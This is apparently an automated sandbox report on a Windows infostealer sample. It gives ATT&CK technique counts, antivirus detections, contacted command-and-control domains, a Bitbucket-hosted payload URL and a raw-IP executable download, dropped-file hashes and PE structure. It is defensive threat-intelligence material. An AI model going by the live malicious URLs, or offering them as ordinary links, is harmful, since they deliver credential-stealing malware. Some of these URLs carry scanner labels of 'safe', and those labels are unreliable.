                Execution: 12 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: 44 Virtualization/Sandbox Evasion; 2 Process Injection; 11 Deobfuscate/Decode Files or Information; 5 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: 1 Query Registry; 851 Security Software Discovery; 44 Virtualization/Sandbox Evasion; 2 Process Discovery; 223 System Information Discovery; Wi-Fi Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: 1 Archive Collected Data; 4 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: 21 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                Source | Detection | Scanner | Label | Link
                fnCae9FQhg.exe | 47% | ReversingLabs | Win32.Infostealer.Tinba |
                fnCae9FQhg.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                fnCae9FQhg.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://observerfry.lat/apix=0 | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/apiype- | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/ksp; | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/apie3 | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/apiC | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/apibP | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/r8; | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/ic | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/ks(; | 0% | Avira URL Cloud | safe |
                https://observerfry.lat/es | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                s3-w.us-east-1.amazonaws.com | 16.182.108.137 | true | false | | high
                bitbucket.org | 185.166.143.48 | true | false | | high
                observerfry.lat | 104.21.36.201 | true | false | | high
                bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                slipperyloo.lat | false | | high
                curverpluch.lat | false | | high
                tentabatte.lat | false | | high
                manyrestro.lat | false | | high
                bashfulacid.lat | false | | high
                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high
                observerfry.lat | false | | high
                wordyfindy.lat | false | | high
                https://observerfry.lat/api | false | | high
                shapestickyr.lat | false | | high
                talkynicer.lat | false | | high
                                                                                      high
                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://web-security-reports.services.atlassian.com/csp-report/bb-websitefnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://observerfry.lat/apiype-fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                  high
                                                                                                  https://observerfry.lat/fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://observerfry.lat/apiCfnCae9FQhg.exe, 00000001.00000003.2365046031.0000000000979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://ocsp.rootca1.amazontrust.com0:fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorfnCae9FQhg.exe, 00000001.00000002.2573643849.0000000005EB9000.00000002.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506188966.0000000005876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.ecosia.org/newtab/fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://dz8aopenkvv6s.cloudfront.netfnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://ac.ecosia.org/autocomplete?q=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://observerfry.lat/ks(;fnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570241622.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506709241.0000000000969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netfnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.cookielaw.org/fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://observerfry.lat/apibPfnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://observerfry.lat/icfnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://remote-app-switcher.stg-east.frontend.public.atl-paas.netfnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://185.215.113.16/off/def.exefnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000979000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570535052.0000000000979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bbuseruploads.s3.amazonaws.com/fnCae9FQhg.exe, 00000001.00000002.2570241622.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506709241.0000000000969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
16.182.108.137 | s3-w.us-east-1.amazonaws.com | United States | unknown | unknown | false
104.21.36.201 | observerfry.lat | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580353
Start date and time: 2024-12-24 11:21:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fnCae9FQhg.exe (renamed because original name is a hash value)
Original Sample Name: f52f8ec2cddc2977f7f74fcfdf87d35f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.107.246.63, 172.202.163.200, 20.190.177.83
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: fnCae9FQhg.exe
Time | Type | Description
05:22:15 | API Interceptor | 24x Sleep call for process: fnCae9FQhg.exe modified
05:22:49 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 16.15.177.52
                                                                                                                                                              iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 3.5.17.0
                                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 54.231.128.9
                                                                                                                                                              http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 54.231.128.17
                                                                                                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 3.5.27.149
                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                              • 3.5.29.203
                                                                                                                                                              OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 52.217.75.84
                                                                                                                                                              fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 3.5.25.145
                                                                                                                                                              bitbucket.orgGq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                              • 185.166.143.49
                                                                                                                                                              Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.49
                                                                                                                                                              fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.49
                                                                                                                                                              No context
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):65536
                                                                                                                                                              Entropy (8bit):1.0445107699253844
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Mdv9eUKWWkD0BU/Qscjudx1fzuiFEZ24IO8o54:UWBBU/wjYzuiFEY4IO8L
                                                                                                                                                              MD5:CC66E7742D0D39D9953E1C238C791EDE
                                                                                                                                                              SHA1:3012E39860D9D62526F5C2CC142B5C72EB8B7182
                                                                                                                                                              SHA-256:B876A0BB375BF9299E7CC13F7C0DE26AC9FEB372B9C4BB35A124074EF1C0C99C
                                                                                                                                                              SHA-512:2F6D6C55FEA26641C6FB25CF337D87A4DEC4659747A95AC64B22701165233D940CCF1E174DD245F4718B92F525EEE2F82741D839AFF79DDC3421CCEA3ACFB1C4
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 10:22:43 2024, 0x1205a4 type
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):285874
                                                                                                                                                              Entropy (8bit):1.5085243908273411
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:IwWjwWBBknncvQlRogxc7JGpGBCUYk+L6HPGvCBFXmFlrc73D5XtCoKwVGOw/:EHBBFveRbc1GpGEkHPGaBVV3tdCIzS
                                                                                                                                                              MD5:1A1E1E4C81583760A677CB0F66F59C3A
                                                                                                                                                              SHA1:5E076804596780ACCA11F0B17856533F38CC5806
                                                                                                                                                              SHA-256:62A159ECF1122210A0152877488CD1FF7687D08A8B2B91114BDDC9A07A121C84
                                                                                                                                                              SHA-512:388CF7F9609592050BBC473A6558CCD3B98ADDE41DE292D63C9F173042A2802128752F125CC1ED5C3B6D4502539463629D0911E1B38FD1442FB59120C5013217
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8378
                                                                                                                                                              Entropy (8bit):3.7030518284797957
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:R6l7wVeJ2I7k6pV6Y2DoSU9PgmfWvZprD89bCXsfN2m:R6lXJ86b6YFSU9Pgmf+wCcfl
                                                                                                                                                              MD5:39047E057A55E4E5E68BBF108C1B4D25
                                                                                                                                                              SHA1:615F3F63AE74491803889DA370CFBD559EE315CE
                                                                                                                                                              SHA-256:3A7878BE20526F1C42E6F5DFE8D28A3F4E3332D776B3FF3020F4B2971CBB9E61
                                                                                                                                                              SHA-512:EF08DED4E52247A5F617106698A2C55342D2A2FCCAAD4A1C5980B8470377EA463A37F0094A20685FA0D2B9A23A3392B78699CF0AF757713E339CCCB8E471A4D1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.<./.P.i.d.
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4624
                                                                                                                                                              Entropy (8bit):4.499413771511221
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cvIwWl8zsUJg77aI9LMHDWpW8VYSYm8M4JUVwLGFr5+q8pi9NXsI0X05d:uIjfSI75MHy7V6JD455D8lk5d
                                                                                                                                                              MD5:1D95DD1E20F6CF098819B45A3F1827AC
                                                                                                                                                              SHA1:D3A494DBFB8B76CC5D5AAE5E5C916B0DC89F32F3
                                                                                                                                                              SHA-256:746A3C0BF00579C2160FCEDE10F458FCEC473F0628959A391070B417865EA651
                                                                                                                                                              SHA-512:EAD03BCB5EDA2AFDC3BD252F1FFB9667CE12F2764625E052B8EF44A0378CEEFAFBBFA12E6171C43F893ABC2C36D5AB294237ED9395166A78A4E2011F76171588
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645205" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                              Entropy (8bit):4.468610901718255
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:jzZfpi6ceLPx9skLmb0f/ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNtjDH5Sh:fZHt/ZWOKnMM6bFpHj4h
                                                                                                                                                              MD5:9587D30EEAEF18D3F19A92B0D512D31A
                                                                                                                                                              SHA1:22181F2A2815E6B8F19F8E33333783520152A781
                                                                                                                                                              SHA-256:9657D7460FAA118CFAB309D7AAB481ACB8B7B739B876263CE717ABEE9C4B97D5
                                                                                                                                                              SHA-512:1F8B4C26FDB8BBCCBE07B1614264B69381D1060665591851F1787391A152F243A76A450917F49C3F25C4965F3E56D81B64078E92C974B76F2B9C3A8E8D0E3220
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....U..............................................................................................................................................................................................................................................................................................................................................E...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Entropy (8bit):6.5580473294915596
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:fnCae9FQhg.exe
                                                                                                                                                              File size:2'960'384 bytes
                                                                                                                                                              MD5:f52f8ec2cddc2977f7f74fcfdf87d35f
                                                                                                                                                              SHA1:f9b514d83e0151d96bd0cae36a3271667cd7282b
                                                                                                                                                              SHA256:f6e61e5caac73a84ad8840618fc8808ab4a55628a1ae8dbddcf8814ae748096a
                                                                                                                                                              SHA512:a145c72fe3e444a948dbd4d8559b73d30a6390aa8b6cc967f80adbad5a84b269690c74f7d2f67d58cbed40e9ad353180aa4de712fe754cbb62325f07bec72fba
                                                                                                                                                              SSDEEP:49152:6vg/PB+M4DkpTmbkvXq+8nFWV+OHlQoiv:6vg/P8xYpTmCXq+8a+MQo
                                                                                                                                                              TLSH:4DD54B61E905B2CFD89A27789527CD42D95D03F4472548C3EEACA4BABD73CC217B6C28
                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.......................... 0.....v.....@.................................Y@..m..
                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                              Entrypoint:0x6ff000
                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:6
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:6
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                              Instruction
                                                                                                                                                              jmp 00007F1BB46EA8DAh

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |


| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x52000 | 0x26400 | 72f80ee348e639cb88b4bb0cf5c333ef | False | 0.9995595894607843 | data | 7.982075034799655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
